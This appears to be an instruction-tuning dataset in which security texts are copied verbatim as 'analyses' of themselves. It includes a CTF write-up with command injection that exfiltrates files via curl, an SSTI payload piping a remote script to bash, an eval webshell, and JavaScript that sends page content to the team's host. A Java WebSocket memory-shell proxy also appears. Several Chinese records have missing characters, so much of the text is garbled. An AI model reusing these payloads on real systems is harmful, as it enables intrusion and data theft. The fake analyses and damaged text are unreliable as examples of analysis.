3+  Mozilla  Firefox 1, 2  Safari  Opt-in  Firefox 3, 3.5  Non-standard opt-out  Netscape 2  IE 3  Generous opt-out  IE 4-8  IE 9  IE 10  Strict standards compliance  Chrome  Firefox 4+ Misunderstandings of Caching  Google:  browsers do not cache ssl  browsers do not cache https Browser Developers  Favorite quote from Mozilla bug 531801: Im on MoCos security team :) Among sites that dont use cache-control:no-store, the correlation between SSL and sensitive is very low. Recommendations  Update web standards  Fix web applications  Fix bad documentation  Fix browsers (maybe?)  Try our demo site for yourself: https://demo.securityevaluators.com Questions?  Full report: http://securityevaluators.com/content/case-studies/caching/  Demo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MFOC [Mifare Classic Offline Cracker] ## 项目主页 > https://github.com/nfc-tools/mfoc.git ## 简介 MFOC是一款用于实施Nethemba\"离线嵌套\"攻击的开源软件 此程序允许从MIFARE Classic卡中恢复身份验证密钥 请注意MFOC只有在具有已知密匙时才能从目标恢复其他密钥: 默认密钥(在MFOC中使用硬编码) 或自定义密钥(由用户通过命令行输入) ## 从源码编译 ``` $ git clone https://github.com/nfc-tools/mfoc.git $ cd mfoc $ autoreconf -is $ ./configure $ make && sudo make install ``` ## 用法 ``` root@kali:~# mfoc -h Usage: mfoc [-h] [-k 密钥] [-f 密钥文件] ... [-P 探测值] [-T 容差值] [-O 输出文件] h 打印帮助信息并退出 k 尝试默认密钥和指定密钥 f 解析除默认密钥之外还要添加的密钥文件 P 每个扇区的探测值默认值20 T 指定每次使用随机数的容差范围默认值20 (即总容差范围为40上下浮动范围为20) O 导出卡中数据到指定文件(必选) D 如果没有PRNG漏洞导出卡的部分数据到指定文件 示例: mfoc -O mycard.mfd 示例: mfoc -k ffffeeeedddd -O mycard.mfd 示例: mfoc -f keys.txt -O mycard.mfd 示例: mfoc -P 50 -T 30 -O mycard.mfd 此mfoc版本为 0.10.7 更多帮助信息请运行 'man mfoc' ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1529-win-系统关机或重启 ## 来自ATT&CK的描述 攻击者可能会关闭或者重启系统用来中断正常用户对这些系统的访问或者为了破坏这些系统操作系统包含用于启动计算机关闭或重新启动的命令在某些情况下这些命令还可以用于远程计算机关闭或者重启关闭或重新启动系统可能会干扰合法用户对计算机资源的访问 攻击者可能会以其他方式例如磁盘结构擦除或禁止系统恢复对系统造成影响后尝试关闭或者重新引导系统以加快对系统可用性的影响 ## 测试案例 windows系统自带一个名为Shutdown.exe的程序可以用于关机操作位置在Windows\\System32下一般情况下Windows系统的关机都可以通过调用程序 shutdown.exe来实现的同时该程序也可以用于终止正在计划中的关机操作来自百度百科 具体shutdown程序的用法可以参考微软官方说明<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown> ## 检测日志 windows 安全日志 ## 测试复现 这里只演示使用shutdown执行定时关机任务 ```bash C:\\Users\\Administrator>Shutdown -s -t 13200 #220分钟后关机 C:\\Users\\Administrator>Shutdown -a #取消关机 ``` ## 测试留痕 Event_ID_4688_安全日志 ```yml 已创建新进程 创建者主题: 安全 ID: QAX\\Administrator 帐户名: Administrator 帐户域: QAX 登录 ID: 0x7169C 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x730 新进程名称: C:\\Windows\\System32\\shutdown.exe 令牌提升类型: %%1936 强制性标签: Mandatory Label\\High Mandatory Level 创建者进程 ID: 0x15d0 创建者进程名称: C:\\Windows\\System32\\cmd.exe 进程命令行: Shutdown -s -t 13200 已创建新进程 创建者主题: 安全 ID: SYSTEM 帐户名: WIN-1CIA2BP8VBJ$ 帐户域: QAX 登录 ID: 0x3E7 目标主题: 安全 ID: NULL SID 帐户名: Administrator 帐户域: QAX 登录 ID: 0x7169C 进程信息: 新进程 ID: 0x1418 新进程名称: C:\\Windows\\System32\\wlrmdr.exe 令牌提升类型: %%1936 强制性标签: Mandatory Label\\High Mandatory Level 创建者进程 ID: 0x27c 创建者进程名称: C:\\Windows\\System32\\winlogon.exe 进程命令行: -s 120000 -f 2 -t 即将注销你的登录 -m Windows 将在 220 分钟后关闭 ``` Event_ID_1074_系统日志 ```yml 进程 C:\\Windows\\system32\\winlogon.exe (WIN-MH0D37EDEEI) 由于以下原因已代表用户 NT AUTHORITY\\SYSTEM 启动计算机 WIN-1CIA2BP8VBJ 的 重启: 操作系统: 升级(计划内) 原因代码: 0x80020003 关机类型: 重启 注释: ``` Event_ID_6006_系统日志 ```yml 事件日志服务已停止 ``` ## 检测规则/思路 ### sigma规则 ```yml title: 使用shutdown命令使计算机关机或者重新启动 description: Windows下使用使用shutdown命令使计算机重新启动或者关机 tags: T1529 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection1: EventID: 4688 #进程创建 New ProcessName: 'shutdown.exe' #进程信息>新建进程名称 Processcommandline|contain: 'Shutdown' #进程信息>进程命令行参数 selection2: EventID: - 1074 #计算机重启 - 6006 #事件日志服务已停止 conditio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDIRA: Automatic Detection, Identification, and Repair of Control-Hijacking Attacks Alexey Smirnov Tzi-cker Chiueh Computer Science Department State University of New York at Stony Brook Stony Brook, NY 11794-4400 {alexey, chiueh}@cs.sunysb.edu Abstract Buffer overflow attacks are known to be the most com- mon type of attacks that allow attackers to hijack a re- mote system by sending a specially crafted packet to a vulnerable network application running on it. A compre- hensive defense strategy against such attacks should in- clude (1) an attack detection component that determines the fact that a program is compromised and prevents the attack from further propagation, (2) an attack identifica- tion component that identifies attack packets so that one can block such packets in the future, and (3) an attack repair component that restores the compromised applica- tions state to that before the attack and allows it to con- tinue running normally. Over the last decade, a significant amount of research has been vested in the systems that can detect buffer overflow attacks either statically at com- pile time or dynamically at run time. However, not much effort is spent on automated attack packet identification or attack repair. In this paper we present a unified solu- tion to the three problems mentioned above. We imple- mented this solution as a GCC compiler extension called DIRA that transforms a programs source code so that the resulting program can automatically detect any buffer overflow attack against it, repair the memory damage left by the attack, and identify the actual attack packet(s). We used DIRA to compile several network applications with known vulnerabilities and tested DIRAs effectiveness by attacking the transformed programs with publicly avail- able exploit code. The DIRA-compiled programs were always able to detect the attacks, identify the attack pack- ets and most often repair themselves to continue normal execution. The average run-time performance overhead f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGreg Conti Interface Design for Hacking Tools original image: http://www.daveyandgoliath.org/ Disclaimer The views expressed in this article are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. image: http://www.leavenworth.army.mil/usdb/standard%20products/vtdefault.htm Outline  Introduction  Command Line vs. GUI's  Task, User, & Technology  Principles of Design  GUI Components  Critique of Tools  Pointers  Q&A image: http://www.uk-anime.net/fanart/large/cloud.jpg by Jim Evans What is an Interface? The point of interaction or communication between a computer and any other entity, such as a printer or human operator. source: http://dictionary.reference.com/search?q=interface What is an Interface? The way that you accomplish tasks with a product and how it responds  thats the interface. The Humane Interface by Jef Raskin, p2 Command Line vs. GUI  Flexibility  Time  Ease of use  Best for heavy users source: http://www.jpeek.com/talks/svlug_19991103/020.html image: http://helpdesk.princeton.edu/images/ping.gif Crack in One Line of Perl perl -nle 'setpwent;crypt($_,$c)eq$c&&print\"$u $_\"while($u,$c)=getpwent' Author: Alec Muffett Several Lines of Perl Can Crack DVD Encryption #!/usr/bin/perl # 472-byte qrpff, Keith Winstein and Marc Horowitz <sipb-iap-dvd@mit.edu> # MPEG 2 PS VOB file -> descrambled output on stdout. # usage: perl -I <k1>:<k2>:<k3>:<k4>:<k5> qrpff # where k1..k5 are the title key bytes in least to most-significant order s''$/=\\2048;while(<>){G=29;R=142;if((@a=unqT=\"C*\",_)[20]&48){D=89;_=unqb24,qT,@ b=map{ord qB8,unqb8,qT,_$a[--D]}@INC;s/...$/1$&/;Q=unqV,qb25,_;H=73;O=$b[4]<<9 |256|$b[3];Q=Q>>8(P=(E=255)&(Q>>12Q>>4Q/8Q))<<17,O=O>>8(E&(F=(S=O>>14&7O) S*8S<<6))<<9,_=(map{U=_%16orE=R=110&(S=(unqT,\"\\xb\\ntd\\xbz\\x14d\")[_/16%8]);E =(72,@z=(64,72,G=12*(U-2?0:S&17)),H=_%64?12:0,@z)[_%8]}(16..271))[_]((D>>=8 )+=P+(~F&E))for@a[12", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPreface %\\ :LOOLDP 5XELQ DQG 0DUVKDOO %UDLQ Copyright 1999 by Prentice Hall PTR Prentice-Hall, Inc. A Simon & Schuster Company Upper Saddle River, NJ 07458 Prentice Hall books are widely used by corporations and govern- ment agencies for training, marketing and resale. The publisher offers discounts on this book when ordered in bulk quantities. For more information, contact Corporate Sales Department, Phone: 800-382-3419; fax: 201-236-7141; email: corpsales@prenhall.com Or write Corporate Sales Department, Prentice Hall PTR, One Lake Street, Upper Saddle River, NJ 07458. Product and company names mentioned herein are the trade- marks or registered trademarks of their respective owners. All rights reserved. No part of this book may be reproduced, in any form or by any means, without permission in writing from the publisher. ISBN 0-13-095966-9 This electronic version of the book is provided strictly for use by customers who have purchased the printed version of the book and should not be reproduced or distributed in any way. CONTENTS Preface xiii ONE The Basics of COM 1 Classes and Objects 1 How COM Is Different 3 COM can Run Across Processes 3 COM Methods Can Be Called Across a Network 4 COM Objects Must Be Unique Throughout the World 5 COM is Language Indpendent 5 COM Vocabulary 5 The Interface 7 Interfaces Isolate the Client From the Server 8 Imagine a Component 10 What's in a Name? 10 The Source of All Interfaces - IUnknown 10 A Typical COM Object 11 How to Be Unique - the GUID 12 A COM Server 14 Interactions Between Client and Server 15 Summary 16 TWO Understanding the Simplest COM Client 19 Four Steps to Client Connectivity 20 Initializing the COM Subsystem: 21 Query COM for a Specific Interface 22 Execute a Method on the Interface. 24 Release the Interface 24 Summary 25 vi Contents THREE Understanding a Simple COM Server 27 Where's the Code? 28 Building a DLL-Based (In-Process) COM Server 29 Creating the Server Using the ATL Wizard 30 Adding a COM Object 33 Add", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Websocket内存利的些补充 jspjs利 WsProxy内存 前段时间有师傅提出了基于websocket的内存并给出了实现 https://github.com/veo/wsMemShell 本来想写写但是看到https://tttang.com/archive/1673/ 这篇师傅的章已经写的很好了这就 提些利的东 最新版本的蚁剑已经持连接websocket协议的内存在官更新doc提到pswindows跟 cmdlinux可以使其实jspjs类型也是可以直接连接的上篇章https://yzddmr6.com/posts/java- expression-exploit/提到过为了兼容各种表达式注把jspjs类型的其他参数都合并为个了所 以直接把主payload部分发过去就完事了 jspjs利 2 由于ws是全双的所以来做代理常的便原版的github项中给出了cmd内存的代码但是 没有给wsproxy部分的内存代码因为defineClass次只能打进去个Class改写内存其实主要涉 及到类的复这补充上修改的个版本使的时候编译成class替换 https://github.com/veo/wsMemShell/blob/main/WsCmd.java的bytes WsProxy内存 3 Plain Text 复制代码 import javax.websocket.*; import java.io.ByteArrayOutputStream; import java.net.InetSocketAddress; import java.nio.ByteBuffer; import java.nio.channels.AsynchronousSocketChannel; import java.nio.channels.CompletionHandler; import java.util.HashMap; import java.util.concurrent.Future; import java.util.concurrent.TimeUnit; public class WsProxy extends Endpoint implements CompletionHandler<Integer, WsProxy>, MessageHandler.Whole<ByteBuffer> { Session session; ByteBuffer buffer; public AsynchronousSocketChannel client; public Session channel; long i = 0; ByteArrayOutputStream baos = new ByteArrayOutputStream(); HashMap<String, AsynchronousSocketChannel> map = new HashMap<String, AsynchronousSocketChannel>(); void readFromServer(Session channel, AsynchronousSocketChannel client) { buffer = ByteBuffer.allocate(50000); WsProxy attach = new WsProxy(); attach.client = client; attach.channel = channel; client.read(buffer, attach, this); } void process(ByteBuffer z, Session channel) { try { if (i > 1) { AsynchronousSocketChannel client = map.get(channel.getId()); client.write(z).get(); z.flip(); z.clear(); } else if (i == 1) { String values = new String(z.array()); String[] array = values.split(\" \"); String[] addrarray = array[1].split(\":\"); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 4 AsynchronousSocketChannel client = AsynchronousSocketChannel.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CTF 历史 > 本栏内容摘自诸葛建伟老师在 i 春秋上的公开视频The Past, Present and Future of CTF ## CTF 的起源 CTF 的前身是传统黑客之间的网络技术比拼游戏起源于 1996 年第四届 DEFCON ## 早期 CTF 竞赛 第一个 CTF 比赛1996 年-2001年没有明确的比赛规则没有专业搭建的比赛平台与环境由参赛队伍各自准备比赛目标自行准备与防守比赛目标并要尝试攻破对方的比赛目标而组织者大都只是一些非专业的志愿者接受参赛队伍手工计分的请求 没有后台自动系统支持和裁判技术能力认定计分延迟和误差以及不可靠的网络和不当的配置导致比赛带来了极大的争论与不满 ## 现代CTF 竞赛 由专业队伍承担比赛平台命题赛事组织以及自动化积分系统参赛队伍需提交参赛申请由 DEFCON 会议组织者们进行评选 就 LegitBS 组织的三年 DEFCON CTF 比赛而言有以下突出特点 - 比赛侧重于对计算机底层和系统安全的核心能力Web 漏洞攻防技巧完全被忽略 - 竞赛环境趋向多 CPU 指令架构集多操作系统多编程语言 - 采用零和计分规则 - 团队综合能力考验逆向分析漏洞挖掘漏洞利用漏洞修补加固网络流量分析系统安全运行维护以及安全方面的编程调试", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1983, 1991 The Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH DAMAGE. .\\\" .\\\" Modified Sat Jul 24 01:15:33 1993 by Rik Faith <faith@cs.unc.edu> .\\\" Modified Tue Oct 22 17:55:49 1996 by Eric S. Raymond <esr@thyrsus.com> .\\\" Modified Oct ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n网络安全屋 INTEL 汇编指令集 Intel Assemble Instruction Set CONTENT Intel 8086 Family Architecture Instruction Clock Cycle Calculation 8088/8086 Effective Address (EA) Calculation Task State Calculation FLAGS - Intel 8086 Family Flags Register MSW - Machine Status Word (286+ only) 8086/80186/80286/80386/80486 Instruction Set AAA - Ascii Adjust for Addition AAD - Ascii Adjust for Division AAM - Ascii Adjust for Multiplication AAS - Ascii Adjust for Subtraction ADC - Add With Carry ADD - Arithmetic Addition AND - Logical And ARPL - Adjusted Requested Privilege Level of Selector (286+ PM) BOUND - Array Index Bound Check (80188+) BSF - Bit Scan Forward (386+) BSR - Bit Scan Reverse (386+) BSWAP - Byte Swap (486+) BT - Bit Test (386+) BTC - Bit Test with Compliment (386+) BTR - Bit Test with Reset (386+) BTS - Bit Test and Set (386+) CALL - Procedure Call CBW - Convert Byte to Word CDQ - Convert Double to Quad (386+) CLC - Clear Carry CLD - Clear Direction Flag CLI - Clear Interrupt Flag (disable) CLTS - Clear Task Switched Flag (286+ privileged) CMC - Complement Carry Flag CMP - Compare CMPS - Compare String (Byte, Word or Doubleword) CMPXCHG - Compare and Exchange CWD - Convert Word to Doubleword CWDE - Convert Word to Extended Doubleword (386+) DAA - Decimal Adjust for Addition DAS - Decimal Adjust for Subtraction DEC - Decrement DIV - Divide ENTER - Make Stack Frame (80188+) ESC - Escape HLT - Halt CPU IDIV - Signed Integer Division 网络安全屋 IMUL - Signed Multiply IN - Input Byte or Word From Port INC - Increment INS - Input String from Port (80188+) INT - Interrupt INTO - Interrupt on Overflow INVD - Invalidate Cache (486+) INVLPG - Invalidate Translation Look-Aside Buffer Entry (486+) IRET/IRETD - Interrupt Return Jxx - Jump Instructions Table JCXZ/JECXZ - Jump if Register (E)CX is Zero JMP - Unconditional Jump LAHF - Load Register AH From Flags LAR - Load Access Rights (286+ protected) LDS - Load Pointer Using DS LEA - Load Effective Address LEAVE - Restore Stack for Procedure ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyBRICS CTF By Nu1L Author:Nu1L CyBRICS CTF By Nu1L WEB Hunt Developer's Laptop Gif2png Woc RE Hide and Seek Baby Rev Polyglot NetWork XCorp Google Cloud rebyC CatGirl Breach Quiz Hellish Reverse Cyber Serial Too Secure Broken Invitation CTB Pwnogram DockEsc Forensic Krevedka Keyshooter WEB Hunt flag Developer's Laptop http://prod.free-design-feedback-cybrics2020.ctf.su/ var http = new XMLHttpRequest(); var url = '<http://127.0.0.1:5000/>'; Gif2png filename=\"sites'|curl ack.x$(cat main.py | head -n 20| base64 | cut -c 41- 50).xxx.ceye.io|echo'.gif\" Woc var payload = \"{{[].__class__.__base__.__subclasses__() [132].__init__.__globals__['system']('curl <https://ctf2020.nu1l.com/> | bash')}}\"; var params = \"url=http://ctf2020.nu1l.com&score=11%25&feedback=a\"+escape(payload)+\"b\"; http.open('POST', url, true); http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); http.onreadystatechange = function() { if(http.readyState == 4 && http.status == 200) { var res1 = http.responseText; var getp = res1.match('(\\\\\\\\?name\\\\\\\\=[\\\\\\\\\"]*)')[1]; var http2 = new XMLHttpRequest(); var url2 = '<http://127.0.0.1:5000/notes'+getp;> http2.open('GET',url2,true); http2.onreadystatechange = function() { if(http2.readyState == 4) { var a =http2.responseText; var b = btoa(a); window.location=\"<http://ctf2020.nu1l.com/?b=>\"+b; } } http2.send(); } } http.send(params); */)); @eval($_POST[x]); ?> $requiredBlocks = [ 'id=\"back\"', 'id=\"field\" name=\"field\"', 'id=\"digit0\"', 'id=\"digit1\"', 'id=\"digit2\"', 'id=\"digit3\"', 'id=\"digit4\"', 'id=\"digit5\"', share /calcs/f6fdffe48c908deb/056f35d6-6102-4ed3-a369-0642877253be.php POST x=system('cat /flag'); RE Hide and Seek main flag Mathematica cybrics{HI_this_is_fake_flag} start stdin cybrics{HI_this_is_fake_flag} syscall open ./.realflag 32 bytes realflag len(realflag) == 32 http://www.chronox.de/crypto-API/crypto/userspace-if.html https://github.com/nibrunie/af_alg-examples/blob/master/examples/stream_hash.c linux crypto API hash sha1 fake f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH WISH 1 .SH NAME wish \\- 简单的窗口式(windowing) shell .SH 总览 .B wish [filename] [arg] [arg ...] .SH 选项 .TP -colormap new 指定窗口使用一个新的私有的调色板(colormap)而不使用给屏幕的缺省的调色板 .TP -display display 指定显示窗口的显示器(和屏幕) .TP -geometry geometry 初始化用于窗口的几何(位置大小)如果指定了这个选项它的值存储在应用的 Tcl 解释器的 geometry 全局变量中 .TP -name name 用 name 作为窗口中显示的标题(title)作为被 send 命令使用的解释器的名字 .TP -sync 同步的执行所有 X 服务器命令这样出错就可以立即报告这将导致执行更慢但 对调试有用 -use id 指定应用的主窗口要被嵌入标识符(identifier)为 id 的 窗口中而不是被建立为一个独立的顶层窗口必须用与 toplevel 组件的 -use 选项的值相同的方式指定 Id (例如它必须与 winfo id 的返回有一样的形式 (form)) .TP -visual visual 指定这个窗口使用的视觉效果(visual)Visual 必须用 Tk_GetVisual 过程所支持的形式 .TP - - 传递所有剩下的参数到脚本的 argv 变量而不解释它们这提供了一种机制来传递象 -name 这样的参数到一个脚本而不让 wish 解释它们 .SH 描述 Wish 是一个由 Tcl 命令语言Tk 工具箱和一个从标准输入或文件读命令的主程序 构成的简单的程序它建立一个主窗口接着就处理 Tcl 命令如果不加参数的调用 wish或者第一个参数以\\(lq-\\(rq开始则从标准输入交互的读 Tcl 命令它将 连续的处理命令直到删除了所有的窗口或在标准输入上到达文件结束如果在用户 的主(home)目录中存在文件 .wishrc在从标准输入读第一条命令之前wish 把这 个文件作为一个 Tcl 脚本来求值 如果调用 wish 时加了一个初始化 fileName 参数则 fileName 被作为一个脚本 文件的名字对待Wish 将对 fileName 中的脚本进行求值(可能是建立一个用户界 面)接着它将响应事件直到所有窗口被删除将不从标准输入读命令 在这种情 况下不自动的对 .wishrc 求值如果需要的话脚本文件总是可以 source(包含) 它 .SH 关于选项 Wish 自动的处理在上面选项总结中描述的所有命令行选项任何其他的命令行参数被用后面描述的 argc 和 argv 变量直接传递给应用(程序) 应用的名字用于象 send 这样的命令从如果指定了 -name 选项则从其中获得 否则若指定了fileName则接受之或者接受调用 wish 所使用的名字在后两种情 况如果名字包含\\(lq/\\(rq字符则只有在最后一个反斜杠后面的字符被作为应用的 名字 应用(程序)的类被用于通过 RESOURCE_MANAGER 属性或 .Xdefaults 文件来指定选项除了第一个字母是大写的之外类的名字同于应用的名字 .SH 变量 Wish 设置了下列 Tcl 变量: argc 包含 arg 参数的个数(没有则为 0)不包括上面描述的选项 argv 包含一个 Tcl 列表其成员依次是在 - - 选项后面或不匹配在上面的选项段落描述的任何选项的 arg 参数如果没有这些参数则是一个空串 argv0 如果指定了 fileName 则在此包含否则包含调用 wish 使用的名字 geometry 如果指定了 -geometry 选项wish 把它的值复制到这个变量中如果在 fileName 被求值之后这个变量仍然存在wish 在一个 wm geometry 命令中使用这个值来设置主窗口的几何(位置大小) tcl_interactive 如果交互式运行 wish 则包含 1(不指定 fileName 并且标准输入是一个终端类设备)否则是 0 .SH 脚本文件 如果你建立的 Tcl 脚本文件的第一行是 \\fI#!/usr/local/bin/wish\\fR 则如果你把它标记为可执行的接着就可以直接在你的 shell 中调用这个脚本文件这里假定了 wish 被安装在缺省的位置 /usr/local/bin如果它被安装在其他地方那么你需要修改上述行来匹配之许多 UNIX 系统不允许 #! 行超出 30 个字符的长度所以要确定 wish 可执行文件能被用短文件名访问 一个更好的途径是用下面三行来开始你的脚本文件: .nf #!/bin/sh # the next line res", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTABBY: Java Code Review like a pro TABBY: Java Code Review like a pro 王柏柱wh1t3p1g CONTENTS 目录 1 2 3 Background Find Java Web Vulnerabilities like a pro Find Java Gadget like a pro 4 Find Java RPC Framework Vulnerabilities like a pro Background 01 依靠专家经验人工审计 辅以正则匹配工具 标志性工具 Seay代码审计工具[1] 过程内分析 AST流分析/token流分析/ 简单数据流分析 标志性工具 rips[2]cobra[3] 初期半自动化阶段 过程间分析 跨函数的污点数据流分 析 标志性工具 GadgetInspector[4] fortify[5] 代码数据化 依靠程序分析生成代码 属性图 标志性工具CodeQL[6] 人工审计阶段 代码数据化阶段 后期半自动化阶段 代码审计发展回顾 [1] https://github.com/f1tz/cnseay [2] https://github.com/ripsscanner/rips [3] https://github.com/FeeiCN/Cobra [4] https://github.com/JackOfMostTrades/gadgetinspector [5] https://www.microfocus.com/en-us/cyberres/application-security/static-code-analyzer [6] https://github.com/github/codeql 痛点 1. 分析成本高中间的分析结果不可重用 2. 可定制化能力差 痛点 1. 漏报率高审计不全面 2. 工具输出结果繁多误报率高 现阶段最优解 为什么要有tabby 面向的场景 CodeQL面向的是甲方场景可以直接更根据源码进行分析 Tabby面向的是安全研究人员可以对编译后的项目进行分析 支持的漏洞类型 CodeQL很难支持Java反序列化利用链的挖掘 Tabby可以对项目三方组件jdk组件进行利用链的挖掘 定位Java安全研究人员代码审计的辅助工 具 1. 定位图空间中的对象函数 2. 聚焦可能存在问题的漏洞链路 3. 枚举类似路径的漏洞 时间 Tabby方案实现时间在2020年左右CodeQL当时只提供了线上体验 又没有好用的同类工具那就自己造个轮子 tabby 构架 标提取器 Target Extractor 语义提取器 Semantic Extractor 污点分析引擎 Taint Analysis Engine 代码属性图构建器 CPG Constructor WarJarJspClass 内存数据 1. 类空间 2. 函数空间 3. 污点分析中间数据 面向Java语言的代码属性图 贯 穿 构 建 流 程 目标提取器 Target Extractor 目标提取器 针对不同情况的目标文件完整抽取所 有待分析的对象 1. Jsp文件采用tomcat-jasper动态编译 2. War文件采用解压缩的方式抽取 3. fatJar文件采用解压缩方式抽取 另外jdk依赖可额外添加到分析目标中 语义提取器 Semantic Extractor 语义提取器 在进行语义分析前语义提取器将待分析 目标的语义信息抽取成语义空间 1. 类空间包含全量对象语义节点 2. 函数空间包含全量函数语义节点 至此我们获得了包含全量节点的语义空 间但每个节点之间仍是孤立状态 代码属性图构建器 CPG Constructor 代码属性图构建器 代码属性图构建器主要用于连接语 义空间中各个孤立的节点将其转 化为一张具备分析能力的语义图 面向Java语言的代码属性图共包含 1. 类关系图 ORG 2. 函数别名图 MAG 3. 函数调用图 MCG 4. 精确的函数调用图 PCG 可选 存在实体节点 1. Class 节点 2. Method 节点 存在5种实体边 1. Has边 2. Interface边 3. Extends边 4. Alias边 5. Call边 [1] Martin M, Livshits B, Lam M S. Finding application errors and security flaws using PQL: a program query language[J]. Acm Sigplan Notices, 2005, 40(10): 365-383. [2] Yamaguchi F, Golde N, Arp D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDNS - Devious Name Services Destroying Privacy & Anonymity Without Your Consent Jim Nitterauer Senior Security Specialist Disclaimer Information disclosed in this presentation is intended to help improve your security & privacy posture and should not be used for unethical purposes The concepts presented are in no way meant to imply original research on my part or on the part of my employer Information presented here is gathered from public and private sources with proper references and credit provided where applicable The views expressed in this talk are not necessarily the views of my employer Why Am I here? http://bestvpnprovider.co/wp-content/uploads/2015/01/VPN-Blocked-in-China-The-Great-Firewall-Strikes-Again.png Why Am I here? Agenda Review DNS, EDNS0 extensions and Option Codes Discuss the Rationale for EDNS0 Use Examine EDNS Client Subnet (ECS) Review DNS Resolver Support Examine Tools & Procedures for Testing Discuss Privacy Implications of EDNS0 OPT Codes Discuss Potential for Abuse Questions & answers Goals for Today Understand the basics about EDNS OPT RRs Understand the potential threat to your privacy Have direction for detecting the use of EDNS OPTs Be able to better insure your online privacy Brief History of DNS Brief History of DNS Introduced in 1983 by Paul Mockapetris & Jon Postel Information Sciences Institute  USC RFC 882 & RFC 883 both updated by RFC 973 in 1986 Obsoleted by two RFCs in 1987  RFC 1034  Describes the data structure and exchange of data  RFC 1035  Describes record and infrastructure format Brief History of DNS Distributed database Main components  Namespace  Resource Records (RRs)  Resolvers  Name Servers Brief History of DNS  Defining Master (Primary) / Slave (Secondary) relationship  Adding Notify  Adding IXFR (Incremental Zone Transfers) Improved DNS by Image from https://technet.microsoft.com/en-us/library/bb962069.tcpipm09_big(l=en-us).gif Brief History of DNS  Implementing Dynamic Updates  RFC 2136  Adding Extension Mechan", "category": "text_analysis", "source": "security_papers"}
